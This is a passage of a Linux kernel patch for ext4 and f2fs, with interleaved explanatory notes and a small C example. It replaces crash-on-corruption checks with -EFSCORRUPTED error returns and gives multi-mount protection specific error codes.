++	 long indexv, indexh;
++
++	 if (unlikely(group >= EXT4_SB(sb)->s_groups_count)) {
++		 ext4_error(sb, "invalid group %u", group);
++		 return NULL;
++	 }
++	 indexv = group >> (EXT4_DESC_PER_BLOCK_BITS(sb));
++	 indexh = group & ((EXT4_DESC_PER_BLOCK(sb)) - 1);
++	 grp_info = sbi_array_rcu_deref(EXT4_SB(sb), s_group_info, indexv);
++	 return grp_info[indexh];
++}
++
+ /*
+  * Return the block number which was discovered to be invalid, or 0 if
+  * the block bitmap is valid.
+@@ -393,7 +409,7 @@ static int ext4_validate_block_bitmap(struct super_block *sb,
+ 
+ 	if (buffer_verified(bh))
+ 		return 0;
+-	if (EXT4_MB_GRP_BBITMAP_CORRUPT(grp))
++	if (!grp || EXT4_MB_GRP_BBITMAP_CORRUPT(grp))
+ 		return -EFSCORRUPTED;
+ 
+ 	ext4_lock_group(sb, block_group);
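
Moving ext4_get_group_info() out of line and returning NULL for an out-of-range group number turns what used to be a BUG_ON() into an error the callers can handle: a corrupted on-disk group count now degrades to -EFSCORRUPTED instead of crashing the kernel. Every call site touched by this patch follows the same shape (sketch):

    grp = ext4_get_group_info(sb, group);
    if (!grp || EXT4_MB_GRP_BBITMAP_CORRUPT(grp))
            return -EFSCORRUPTED;   /* corrupt filesystem, not a kernel bug */
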
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index a2bc440743ae4..2156d2a1a7700 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -2716,6 +2716,8 @@ extern void ext4_check_blocks_bitmap(struct super_block *);
+ extern struct ext4_group_desc * ext4_get_group_desc(struct super_block * sb,
+ 						    ext4_group_t block_group,
+ 						    struct buffer_head ** bh);
++extern struct ext4_group_info *ext4_get_group_info(struct super_block *sb,
++						   ext4_group_t group);
+ extern int ext4_should_retry_alloc(struct super_block *sb, int *retries);
+ 
+ extern struct buffer_head *ext4_read_block_bitmap_nowait(struct super_block *sb,
+@@ -3322,19 +3324,6 @@ static inline void ext4_isize_set(struct ext4_inode *raw_inode, loff_t i_size)
+ 	raw_inode->i_size_high = cpu_to_le32(i_size >> 32);
+ }
+ 
+-static inline
+-struct ext4_group_info *ext4_get_group_info(struct super_block *sb,
+-					    ext4_group_t group)
+-{
+-	 struct ext4_group_info **grp_info;
+-	 long indexv, indexh;
+-	 BUG_ON(group >= EXT4_SB(sb)->s_groups_count);
+-	 indexv = group >> (EXT4_DESC_PER_BLOCK_BITS(sb));
+-	 indexh = group & ((EXT4_DESC_PER_BLOCK(sb)) - 1);
+-	 grp_info = sbi_array_rcu_deref(EXT4_SB(sb), s_group_info, indexv);
+-	 return grp_info[indexh];
+-}
+-
+ /*
+  * Reading s_groups_count requires using smp_rmb() afterwards.  See
+  * the locking protocol documented in the comments of ext4_group_add()
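
The behavioural change behind moving this helper out of line: callers now
get NULL instead of a BUG() for a corrupted group number. As the hunks
below show, every call site therefore gains a check of roughly this shape
(sketch only, context abridged):

	struct ext4_group_info *grp = ext4_get_group_info(sb, group);

	if (!grp)
		return -EFSCORRUPTED;	/* on-disk corruption, fail gracefully */
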
+diff --git a/fs/ext4/ialloc.c b/fs/ext4/ialloc.c
+index e9bc46684106b..e09c74927a430 100644
+--- a/fs/ext4/ialloc.c
++++ b/fs/ext4/ialloc.c
+@@ -91,7 +91,7 @@ static int ext4_validate_inode_bitmap(struct super_block *sb,
+ 
+ 	if (buffer_verified(bh))
+ 		return 0;
+-	if (EXT4_MB_GRP_IBITMAP_CORRUPT(grp))
++	if (!grp || EXT4_MB_GRP_IBITMAP_CORRUPT(grp))
+ 		return -EFSCORRUPTED;
+ 
+ 	ext4_lock_group(sb, block_group);
+@@ -293,7 +293,7 @@ void ext4_free_inode(handle_t *handle, struct inode *inode)
+ 	}
+ 	if (!(sbi->s_mount_state & EXT4_FC_REPLAY)) {
+ 		grp = ext4_get_group_info(sb, block_group);
+-		if (unlikely(EXT4_MB_GRP_IBITMAP_CORRUPT(grp))) {
++		if (!grp || unlikely(EXT4_MB_GRP_IBITMAP_CORRUPT(grp))) {
+ 			fatal = -EFSCORRUPTED;
+ 			goto error_return;
+ 		}
+@@ -1047,7 +1047,7 @@ got_group:
+ 			 * Skip groups with already-known suspicious inode
+ 			 * tables
+ 			 */
+-			if (EXT4_MB_GRP_IBITMAP_CORRUPT(grp))
++			if (!grp || EXT4_MB_GRP_IBITMAP_CORRUPT(grp))
+ 				goto next_group;
+ 		}
+ 
+@@ -1185,6 +1185,10 @@ got:
+ 
+ 		if (!(sbi->s_mount_state & EXT4_FC_REPLAY)) {
+ 			grp = ext4_get_group_info(sb, group);
++			if (!grp) {
++				err = -EFSCORRUPTED;
++				goto out;
++			}
+ 			down_read(&grp->alloc_sem); /*
+ 						     * protect vs itable
+ 						     * lazyinit
+@@ -1528,7 +1532,7 @@ int ext4_init_inode_table(struct super_block *sb, ext4_group_t group,
+ 	}
+ 
+ 	gdp = ext4_get_group_desc(sb, group, &group_desc_bh);
+-	if (!gdp)
++	if (!gdp || !grp)
+ 		goto out;
+ 
+ 	/*
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 912c4a1093fe5..32d88757a780e 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -745,6 +745,8 @@ static int __mb_check_buddy(struct ext4_buddy *e4b, char *file,
+ 	MB_CHECK_ASSERT(e4b->bd_info->bb_fragments == fragments);
+ 
+ 	grp = ext4_get_group_info(sb, e4b->bd_group);
++	if (!grp)
++		return NULL;
+ 	list_for_each(cur, &grp->bb_prealloc_list) {
+ 		ext4_group_t groupnr;
+ 		struct ext4_prealloc_space *pa;
+@@ -1060,9 +1062,9 @@ mb_set_largest_free_order(struct super_block *sb, struct ext4_group_info *grp)
+ 
+ static noinline_for_stack
+ void ext4_mb_generate_buddy(struct super_block *sb,
+-				void *buddy, void *bitmap, ext4_group_t group)
++			    void *buddy, void *bitmap, ext4_group_t group,
++			    struct ext4_group_info *grp)
+ {
+-	struct ext4_group_info *grp = ext4_get_group_info(sb, group);
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	ext4_grpblk_t max = EXT4_CLUSTERS_PER_GROUP(sb);
+ 	ext4_grpblk_t i = 0;
+@@ -1183,6 +1185,8 @@ static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
+ 			break;
+ 
+ 		grinfo = ext4_get_group_info(sb, group);
++		if (!grinfo)
++			continue;
+ 		/*
+ 		 * If page is uptodate then we came here after online resize
+ 		 * which added some new uninitialized group info structs, so
+@@ -1248,6 +1252,10 @@ static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
+ 				group, page->index, i * blocksize);
+ 			trace_ext4_mb_buddy_bitmap_load(sb, group);
+ 			grinfo = ext4_get_group_info(sb, group);
++			if (!grinfo) {
++				err = -EFSCORRUPTED;
++				goto out;
++			}
+ 			grinfo->bb_fragments = 0;
+ 			memset(grinfo->bb_counters, 0,
+ 			       sizeof(*grinfo->bb_counters) *
+@@ -1258,7 +1266,7 @@ static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
+ 			ext4_lock_group(sb, group);
+ 			/* init the buddy */
+ 			memset(data, 0xff, blocksize);
+-			ext4_mb_generate_buddy(sb, data, incore, group);
++			ext4_mb_generate_buddy(sb, data, incore, group, grinfo);
+ 			ext4_unlock_group(sb, group);
+ 			incore = NULL;
+ 		} else {
+@@ -1372,6 +1380,9 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group, gfp_t gfp)
+ 	might_sleep();
+ 	mb_debug(sb, "init group %u\n", group);
+ 	this_grp = ext4_get_group_info(sb, group);
++	if (!this_grp)
++		return -EFSCORRUPTED;
++
+ 	/*
+ 	 * This ensures that we don't reinit the buddy cache
+ 	 * page which map to the group from which we are already
+@@ -1446,6 +1457,8 @@ ext4_mb_load_buddy_gfp(struct super_block *sb, ext4_group_t group,
+ 
+ 	blocks_per_page = PAGE_SIZE / sb->s_blocksize;
+ 	grp = ext4_get_group_info(sb, group);
++	if (!grp)
++		return -EFSCORRUPTED;
+ 
+ 	e4b->bd_blkbits = sb->s_blocksize_bits;
+ 	e4b->bd_info = grp;
+@@ -2162,7 +2175,9 @@ int ext4_mb_find_by_goal(struct ext4_allocation_context *ac,
+ 	struct ext4_group_info *grp = ext4_get_group_info(ac->ac_sb, group);
+ 	struct ext4_free_extent ex;
+ 
+-	if (!(ac->ac_flags & EXT4_MB_HINT_TRY_GOAL))
++	if (!grp)
++		return -EFSCORRUPTED;
++	if (!(ac->ac_flags & (EXT4_MB_HINT_TRY_GOAL | EXT4_MB_HINT_GOAL_ONLY)))
+ 		return 0;
+ 	if (grp->bb_free == 0)
+ 		return 0;
+@@ -2386,7 +2401,7 @@ static bool ext4_mb_good_group(struct ext4_allocation_context *ac,
+ 
+ 	BUG_ON(cr < 0 || cr >= 4);
+ 
+-	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(grp)))
++	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(grp) || !grp))
+ 		return false;
+ 
+ 	free = grp->bb_free;
+@@ -2455,6 +2470,8 @@ static int ext4_mb_good_group_nolock(struct ext4_allocation_context *ac,
+ 	ext4_grpblk_t free;
+ 	int ret = 0;
+ 
++	if (!grp)
++		return -EFSCORRUPTED;
+ 	if (sbi->s_mb_stats)
+ 		atomic64_inc(&sbi->s_bal_cX_groups_considered[ac->ac_criteria]);
+ 	if (should_lock) {
+@@ -2535,7 +2552,7 @@ ext4_group_t ext4_mb_prefetch(struct super_block *sb, ext4_group_t group,
+ 		 * prefetch once, so we avoid getblk() call, which can
+ 		 * be expensive.
+ 		 */
+-		if (!EXT4_MB_GRP_TEST_AND_SET_READ(grp) &&
++		if (gdp && grp && !EXT4_MB_GRP_TEST_AND_SET_READ(grp) &&
+ 		    EXT4_MB_GRP_NEED_INIT(grp) &&
+ 		    ext4_free_group_clusters(sb, gdp) > 0 &&
+ 		    !(ext4_has_group_desc_csum(sb) &&
+@@ -2579,7 +2596,7 @@ void ext4_mb_prefetch_fini(struct super_block *sb, ext4_group_t group,
+ 		group--;
+ 		grp = ext4_get_group_info(sb, group);
+ 
+-		if (EXT4_MB_GRP_NEED_INIT(grp) &&
++		if (grp && gdp && EXT4_MB_GRP_NEED_INIT(grp) &&
+ 		    ext4_free_group_clusters(sb, gdp) > 0 &&
+ 		    !(ext4_has_group_desc_csum(sb) &&
+ 		      (gdp->bg_flags & cpu_to_le16(EXT4_BG_BLOCK_UNINIT)))) {
+@@ -2838,6 +2855,8 @@ static int ext4_mb_seq_groups_show(struct seq_file *seq, void *v)
+ 		sizeof(struct ext4_group_info);
+ 
+ 	grinfo = ext4_get_group_info(sb, group);
++	if (!grinfo)
++		return 0;
+ 	/* Load the group info in memory only if not already loaded. */
+ 	if (unlikely(EXT4_MB_GRP_NEED_INIT(grinfo))) {
+ 		err = ext4_mb_load_buddy(sb, group, &e4b);
+@@ -2848,7 +2867,7 @@ static int ext4_mb_seq_groups_show(struct seq_file *seq, void *v)
+ 		buddy_loaded = 1;
+ 	}
+ 
+-	memcpy(&sg, ext4_get_group_info(sb, group), i);
++	memcpy(&sg, grinfo, i);
+ 
+ 	if (buddy_loaded)
+ 		ext4_mb_unload_buddy(&e4b);
+@@ -3210,8 +3229,12 @@ static int ext4_mb_init_backend(struct super_block *sb)
+ 
+ err_freebuddy:
+ 	cachep = get_groupinfo_cache(sb->s_blocksize_bits);
+-	while (i-- > 0)
+-		kmem_cache_free(cachep, ext4_get_group_info(sb, i));
++	while (i-- > 0) {
++		struct ext4_group_info *grp = ext4_get_group_info(sb, i);
++
++		if (grp)
++			kmem_cache_free(cachep, grp);
++	}
+ 	i = sbi->s_group_info_size;
+ 	rcu_read_lock();
+ 	group_info = rcu_dereference(sbi->s_group_info);
+@@ -3525,6 +3548,8 @@ int ext4_mb_release(struct super_block *sb)
+ 		for (i = 0; i < ngroups; i++) {
+ 			cond_resched();
+ 			grinfo = ext4_get_group_info(sb, i);
++			if (!grinfo)
++				continue;
+ 			mb_group_bb_bitmap_free(grinfo);
+ 			ext4_lock_group(sb, i);
+ 			count = ext4_mb_cleanup_pa(grinfo);
+@@ -3993,6 +4018,7 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 				struct ext4_allocation_request *ar)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(ac->ac_sb);
++	struct ext4_super_block *es = sbi->s_es;
+ 	int bsbits, max;
+ 	ext4_lblk_t end;
+ 	loff_t size, start_off;
+@@ -4188,18 +4214,21 @@ ext4_mb_normalize_request(struct ext4_allocation_context *ac,
+ 	ac->ac_g_ex.fe_len = EXT4_NUM_B2C(sbi, size);
+ 
+ 	/* define goal start in order to merge */
+-	if (ar->pright && (ar->lright == (start + size))) {
++	if (ar->pright && (ar->lright == (start + size)) &&
++	    ar->pright >= size &&
++	    ar->pright - size >= le32_to_cpu(es->s_first_data_block)) {
+ 		/* merge to the right */
+ 		ext4_get_group_no_and_offset(ac->ac_sb, ar->pright - size,
+-						&ac->ac_f_ex.fe_group,
+-						&ac->ac_f_ex.fe_start);
++						&ac->ac_g_ex.fe_group,
++						&ac->ac_g_ex.fe_start);
+ 		ac->ac_flags |= EXT4_MB_HINT_TRY_GOAL;
+ 	}
+-	if (ar->pleft && (ar->lleft + 1 == start)) {
++	if (ar->pleft && (ar->lleft + 1 == start) &&
++	    ar->pleft + 1 < ext4_blocks_count(es)) {
+ 		/* merge to the left */
+ 		ext4_get_group_no_and_offset(ac->ac_sb, ar->pleft + 1,
+-						&ac->ac_f_ex.fe_group,
+-						&ac->ac_f_ex.fe_start);
++						&ac->ac_g_ex.fe_group,
++						&ac->ac_g_ex.fe_start);
+ 		ac->ac_flags |= EXT4_MB_HINT_TRY_GOAL;
+ 	}
+ 
+@@ -4292,6 +4321,7 @@ static void ext4_mb_use_inode_pa(struct ext4_allocation_context *ac,
+ 	BUG_ON(start < pa->pa_pstart);
+ 	BUG_ON(end > pa->pa_pstart + EXT4_C2B(sbi, pa->pa_len));
+ 	BUG_ON(pa->pa_free < len);
++	BUG_ON(ac->ac_b_ex.fe_len <= 0);
+ 	pa->pa_free -= len;
+ 
+ 	mb_debug(ac->ac_sb, "use %llu/%d from inode pa %p\n", start, len, pa);
+@@ -4454,6 +4484,8 @@ static void ext4_mb_generate_from_freelist(struct super_block *sb, void *bitmap,
+ 	struct ext4_free_data *entry;
+ 
+ 	grp = ext4_get_group_info(sb, group);
++	if (!grp)
++		return;
+ 	n = rb_first(&(grp->bb_free_root));
+ 
+ 	while (n) {
+@@ -4481,6 +4513,9 @@ void ext4_mb_generate_from_pa(struct super_block *sb, void *bitmap,
+ 	int preallocated = 0;
+ 	int len;
+ 
++	if (!grp)
++		return;
++
+ 	/* all form of preallocation discards first load group,
+ 	 * so the only competing code is preallocation use.
+ 	 * we don't need any locking here
+@@ -4616,10 +4651,8 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 	pa = ac->ac_pa;
+ 
+ 	if (ac->ac_b_ex.fe_len < ac->ac_g_ex.fe_len) {
+-		int winl;
+-		int wins;
+-		int win;
+-		int offs;
++		int new_bex_start;
++		int new_bex_end;
+ 
+ 		/* we can't allocate as much as normalizer wants.
+ 		 * so, found space must get proper lstart
+@@ -4627,26 +4660,40 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 		BUG_ON(ac->ac_g_ex.fe_logical > ac->ac_o_ex.fe_logical);
+ 		BUG_ON(ac->ac_g_ex.fe_len < ac->ac_o_ex.fe_len);
+ 
+-		/* we're limited by original request in that
+-		 * logical block must be covered any way
+-		 * winl is window we can move our chunk within */
+-		winl = ac->ac_o_ex.fe_logical - ac->ac_g_ex.fe_logical;
++		/*
++		 * Use the below logic for adjusting best extent as it keeps
++		 * fragmentation in check while ensuring logical range of best
++		 * extent doesn't overflow out of goal extent:
++		 *
++		 * 1. Check if best ex can be kept at end of goal and still
++		 *    cover original start
++		 * 2. Else, check if best ex can be kept at start of goal and
++		 *    still cover original start
++		 * 3. Else, keep the best ex at start of original request.
++		 */
++		new_bex_end = ac->ac_g_ex.fe_logical +
++			EXT4_C2B(sbi, ac->ac_g_ex.fe_len);
++		new_bex_start = new_bex_end - EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
++		if (ac->ac_o_ex.fe_logical >= new_bex_start)
++			goto adjust_bex;
+ 
+-		/* also, we should cover whole original request */
+-		wins = EXT4_C2B(sbi, ac->ac_b_ex.fe_len - ac->ac_o_ex.fe_len);
++		new_bex_start = ac->ac_g_ex.fe_logical;
++		new_bex_end =
++			new_bex_start + EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
++		if (ac->ac_o_ex.fe_logical < new_bex_end)
++			goto adjust_bex;
+ 
+-		/* the smallest one defines real window */
+-		win = min(winl, wins);
++		new_bex_start = ac->ac_o_ex.fe_logical;
++		new_bex_end =
++			new_bex_start + EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
+ 
+-		offs = ac->ac_o_ex.fe_logical %
+-			EXT4_C2B(sbi, ac->ac_b_ex.fe_len);
+-		if (offs && offs < win)
+-			win = offs;
++adjust_bex:
++		ac->ac_b_ex.fe_logical = new_bex_start;
+ 
+-		ac->ac_b_ex.fe_logical = ac->ac_o_ex.fe_logical -
+-			EXT4_NUM_B2C(sbi, win);
+ 		BUG_ON(ac->ac_o_ex.fe_logical < ac->ac_b_ex.fe_logical);
+ 		BUG_ON(ac->ac_o_ex.fe_len > ac->ac_b_ex.fe_len);
++		BUG_ON(new_bex_end > (ac->ac_g_ex.fe_logical +
++				      EXT4_C2B(sbi, ac->ac_g_ex.fe_len)));
+ 	}
+ 
+ 	/* preallocation can change ac_b_ex, thus we store actually
+@@ -4672,6 +4719,8 @@ ext4_mb_new_inode_pa(struct ext4_allocation_context *ac)
+ 
+ 	ei = EXT4_I(ac->ac_inode);
+ 	grp = ext4_get_group_info(sb, ac->ac_b_ex.fe_group);
++	if (!grp)
++		return;
+ 
+ 	pa->pa_obj_lock = &ei->i_prealloc_lock;
+ 	pa->pa_inode = ac->ac_inode;
+@@ -4725,6 +4774,8 @@ ext4_mb_new_group_pa(struct ext4_allocation_context *ac)
+ 	atomic_add(pa->pa_free, &EXT4_SB(sb)->s_mb_preallocated);
+ 
+ 	grp = ext4_get_group_info(sb, ac->ac_b_ex.fe_group);
++	if (!grp)
++		return;
+ 	lg = ac->ac_lg;
+ 	BUG_ON(lg == NULL);
+ 
+@@ -4853,6 +4904,8 @@ ext4_mb_discard_group_preallocations(struct super_block *sb,
+ 	int err;
+ 	int free = 0;
+ 
++	if (!grp)
++		return 0;
+ 	mb_debug(sb, "discard preallocation for group %u\n", group);
+ 	if (list_empty(&grp->bb_prealloc_list))
+ 		goto out_dbg;
+@@ -5090,6 +5143,9 @@ static inline void ext4_mb_show_pa(struct super_block *sb)
+ 		struct ext4_prealloc_space *pa;
+ 		ext4_grpblk_t start;
+ 		struct list_head *cur;
++
++		if (!grp)
++			continue;
+ 		ext4_lock_group(sb, i);
+ 		list_for_each(cur, &grp->bb_prealloc_list) {
+ 			pa = list_entry(cur, struct ext4_prealloc_space,
+@@ -5895,6 +5951,7 @@ static void ext4_mb_clear_bb(handle_t *handle, struct inode *inode,
+ 	struct buffer_head *bitmap_bh = NULL;
+ 	struct super_block *sb = inode->i_sb;
+ 	struct ext4_group_desc *gdp;
++	struct ext4_group_info *grp;
+ 	unsigned int overflow;
+ 	ext4_grpblk_t bit;
+ 	struct buffer_head *gd_bh;
+@@ -5920,8 +5977,8 @@ do_more:
+ 	overflow = 0;
+ 	ext4_get_group_no_and_offset(sb, block, &block_group, &bit);
+ 
+-	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(
+-			ext4_get_group_info(sb, block_group))))
++	grp = ext4_get_group_info(sb, block_group);
++	if (unlikely(!grp || EXT4_MB_GRP_BBITMAP_CORRUPT(grp)))
+ 		return;
+ 
+ 	/*
+@@ -6523,6 +6580,8 @@ int ext4_trim_fs(struct super_block *sb, struct fstrim_range *range)
+ 
+ 	for (group = first_group; group <= last_group; group++) {
+ 		grp = ext4_get_group_info(sb, group);
++		if (!grp)
++			continue;
+ 		/* We only do this if the grp has never been initialized */
+ 		if (unlikely(EXT4_MB_GRP_NEED_INIT(grp))) {
+ 			ret = ext4_mb_init_group(sb, group, GFP_NOFS);
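
The reworked placement logic in the ext4_mb_new_inode_pa() hunk above is
easier to follow with concrete numbers. A standalone sketch (hypothetical
block numbers, clusters folded into blocks for simplicity):

	#include <stdio.h>

	/* Keep the best extent (length blen) inside the goal range
	 * [gstart, gstart + glen) while still covering the originally
	 * requested block ostart -- the three cases from the patch. */
	static long place_best(long gstart, long glen, long blen, long ostart)
	{
		long start, end;

		/* 1. best extent at the end of the goal range */
		end = gstart + glen;
		start = end - blen;
		if (ostart >= start)
			return start;

		/* 2. best extent at the start of the goal range */
		start = gstart;
		end = start + blen;
		if (ostart < end)
			return start;

		/* 3. fall back: anchor at the original request */
		return ostart;
	}

	int main(void)
	{
		printf("%ld\n", place_best(100, 64, 16, 150));	/* 148: case 1 */
		printf("%ld\n", place_best(100, 64, 16, 104));	/* 100: case 2 */
		printf("%ld\n", place_best(0, 1000, 4, 500));	/* 500: case 3 */
		return 0;
	}
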
+diff --git a/fs/ext4/mmp.c b/fs/ext4/mmp.c
+index 23930ed3cbda6..24b3beddaf4ba 100644
+--- a/fs/ext4/mmp.c
++++ b/fs/ext4/mmp.c
+@@ -296,6 +296,7 @@ int ext4_multi_mount_protect(struct super_block *sb,
+ 	if (mmp_block < le32_to_cpu(es->s_first_data_block) ||
+ 	    mmp_block >= ext4_blocks_count(es)) {
+ 		ext4_warning(sb, "Invalid MMP block in superblock");
++		retval = -EINVAL;
+ 		goto failed;
+ 	}
+ 
+@@ -321,6 +322,7 @@ int ext4_multi_mount_protect(struct super_block *sb,
+ 
+ 	if (seq == EXT4_MMP_SEQ_FSCK) {
+ 		dump_mmp_msg(sb, mmp, "fsck is running on the filesystem");
++		retval = -EBUSY;
+ 		goto failed;
+ 	}
+ 
+@@ -334,6 +336,7 @@ int ext4_multi_mount_protect(struct super_block *sb,
+ 
+ 	if (schedule_timeout_interruptible(HZ * wait_time) != 0) {
+ 		ext4_warning(sb, "MMP startup interrupted, failing mount\n");
++		retval = -ETIMEDOUT;
+ 		goto failed;
+ 	}
+ 
+@@ -344,6 +347,7 @@ int ext4_multi_mount_protect(struct super_block *sb,
+ 	if (seq != le32_to_cpu(mmp->mmp_seq)) {
+ 		dump_mmp_msg(sb, mmp,
+ 			     "Device is already active on another node.");
++		retval = -EBUSY;
+ 		goto failed;
+ 	}
+ 
+@@ -367,6 +371,7 @@ skip:
+ 	 */
+ 	if (schedule_timeout_interruptible(HZ * wait_time) != 0) {
+ 		ext4_warning(sb, "MMP startup interrupted, failing mount");
++		retval = -ETIMEDOUT;
+ 		goto failed;
+ 	}
+ 
+@@ -377,6 +382,7 @@ skip:
+ 	if (seq != le32_to_cpu(mmp->mmp_seq)) {
+ 		dump_mmp_msg(sb, mmp,
+ 			     "Device is already active on another node.");
++		retval = -EBUSY;
+ 		goto failed;
+ 	}
+ 
+@@ -396,6 +402,7 @@ skip:
+ 		EXT4_SB(sb)->s_mmp_tsk = NULL;
+ 		ext4_warning(sb, "Unable to create kmmpd thread for %s.",
+ 			     sb->s_id);
++		retval = -ENOMEM;
+ 		goto failed;
+ 	}
+ 
+@@ -403,5 +410,5 @@ skip:
+ 
+ failed:
+ 	brelse(bh);
+-	return 1;
++	return retval;
+ }
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index d542f068ca99f..bd2e803d653f7 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -1049,6 +1049,8 @@ void ext4_mark_group_bitmap_corrupted(struct super_block *sb,
+ 	struct ext4_group_desc *gdp = ext4_get_group_desc(sb, group, NULL);
+ 	int ret;
+ 
++	if (!grp || !gdp)
++		return;
+ 	if (flags & EXT4_GROUP_INFO_BBITMAP_CORRUPT) {
+ 		ret = ext4_test_and_set_bit(EXT4_GROUP_INFO_BBITMAP_CORRUPT_BIT,
+ 					    &grp->bb_state);
+@@ -5281,9 +5283,11 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 			  ext4_has_feature_orphan_present(sb) ||
+ 			  ext4_has_feature_journal_needs_recovery(sb));
+ 
+-	if (ext4_has_feature_mmp(sb) && !sb_rdonly(sb))
+-		if (ext4_multi_mount_protect(sb, le64_to_cpu(es->s_mmp_block)))
++	if (ext4_has_feature_mmp(sb) && !sb_rdonly(sb)) {
++		err = ext4_multi_mount_protect(sb, le64_to_cpu(es->s_mmp_block));
++		if (err)
+ 			goto failed_mount3a;
++	}
+ 
+ 	/*
+ 	 * The first inode we look at is the journal inode.  Don't try
+@@ -6337,6 +6341,7 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	struct ext4_mount_options old_opts;
+ 	ext4_group_t g;
+ 	int err = 0;
++	int enable_rw = 0;
+ #ifdef CONFIG_QUOTA
+ 	int enable_quota = 0;
+ 	int i, j;
+@@ -6523,13 +6528,13 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 			if (err)
+ 				goto restore_opts;
+ 
+-			sb->s_flags &= ~SB_RDONLY;
+-			if (ext4_has_feature_mmp(sb))
+-				if (ext4_multi_mount_protect(sb,
+-						le64_to_cpu(es->s_mmp_block))) {
+-					err = -EROFS;
++			enable_rw = 1;
++			if (ext4_has_feature_mmp(sb)) {
++				err = ext4_multi_mount_protect(sb,
++						le64_to_cpu(es->s_mmp_block));
++				if (err)
+ 					goto restore_opts;
+-				}
++			}
+ #ifdef CONFIG_QUOTA
+ 			enable_quota = 1;
+ #endif
+@@ -6582,6 +6587,9 @@ static int __ext4_remount(struct fs_context *fc, struct super_block *sb)
+ 	if (!test_opt(sb, BLOCK_VALIDITY) && sbi->s_system_blks)
+ 		ext4_release_system_zone(sb);
+ 
++	if (enable_rw)
++		sb->s_flags &= ~SB_RDONLY;
++
+ 	if (!ext4_has_feature_mmp(sb) || sb_rdonly(sb))
+ 		ext4_stop_mmpd(sbi);
+ 
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index 0c82dae082aa9..5df04ed010cae 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -322,8 +322,15 @@ static int __f2fs_write_meta_page(struct page *page,
+ 
+ 	trace_f2fs_writepage(page, META);
+ 
+-	if (unlikely(f2fs_cp_error(sbi)))
++	if (unlikely(f2fs_cp_error(sbi))) {
++		if (is_sbi_flag_set(sbi, SBI_IS_CLOSE)) {
++			ClearPageUptodate(page);
++			dec_page_count(sbi, F2FS_DIRTY_META);
++			unlock_page(page);
++			return 0;
++		}
+ 		goto redirty_out;
++	}
+ 	if (unlikely(is_sbi_flag_set(sbi, SBI_POR_DOING)))
+ 		goto redirty_out;
+ 	if (wbc->for_reclaim && page->index < GET_SUM_BLOCK(sbi, 0))
+@@ -1301,7 +1308,8 @@ void f2fs_wait_on_all_pages(struct f2fs_sb_info *sbi, int type)
+ 		if (!get_pages(sbi, type))
+ 			break;
+ 
+-		if (unlikely(f2fs_cp_error(sbi)))
++		if (unlikely(f2fs_cp_error(sbi) &&
++			!is_sbi_flag_set(sbi, SBI_IS_CLOSE)))
+ 			break;
+ 
+ 		if (type == F2FS_DIRTY_META)
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index de6b056f090b3..36db9aab47790 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2788,7 +2788,8 @@ int f2fs_write_single_data_page(struct page *page, int *submitted,
+ 		 * don't drop any dirty dentry pages for keeping lastest
+ 		 * directory structure.
+ 		 */
+-		if (S_ISDIR(inode->i_mode))
++		if (S_ISDIR(inode->i_mode) &&
++				!is_sbi_flag_set(sbi, SBI_IS_CLOSE))
+ 			goto redirty_out;
+ 		goto out;
+ 	}
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index a0a232551da97..8d7dc76e6f935 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -4435,6 +4435,11 @@ static inline bool f2fs_hw_is_readonly(struct f2fs_sb_info *sbi)
+ 	return false;
+ }
+ 
++static inline bool f2fs_dev_is_readonly(struct f2fs_sb_info *sbi)
++{
++	return f2fs_sb_has_readonly(sbi) || f2fs_hw_is_readonly(sbi);
++}
++
+ static inline bool f2fs_lfs_mode(struct f2fs_sb_info *sbi)
+ {
+ 	return F2FS_OPTION(sbi).fs_mode == FS_MODE_LFS;
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 5cd19fdc10596..7e497f5b349ce 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -1811,6 +1811,7 @@ int f2fs_gc(struct f2fs_sb_info *sbi, struct f2fs_gc_control *gc_control)
+ 		.iroot = RADIX_TREE_INIT(gc_list.iroot, GFP_NOFS),
+ 	};
+ 	unsigned int skipped_round = 0, round = 0;
++	unsigned int upper_secs;
+ 
+ 	trace_f2fs_gc_begin(sbi->sb, gc_type, gc_control->no_bg_gc,
+ 				gc_control->nr_free_secs,
+@@ -1896,8 +1897,13 @@ retry:
+ 		}
+ 	}
+ 
+-	/* Write checkpoint to reclaim prefree segments */
+-	if (free_sections(sbi) < NR_CURSEG_PERSIST_TYPE &&
++	__get_secs_required(sbi, NULL, &upper_secs, NULL);
++
++	/*
++	 * Write checkpoint to reclaim prefree segments.
++	 * We need three more sections for the writer's data/node/dentry.
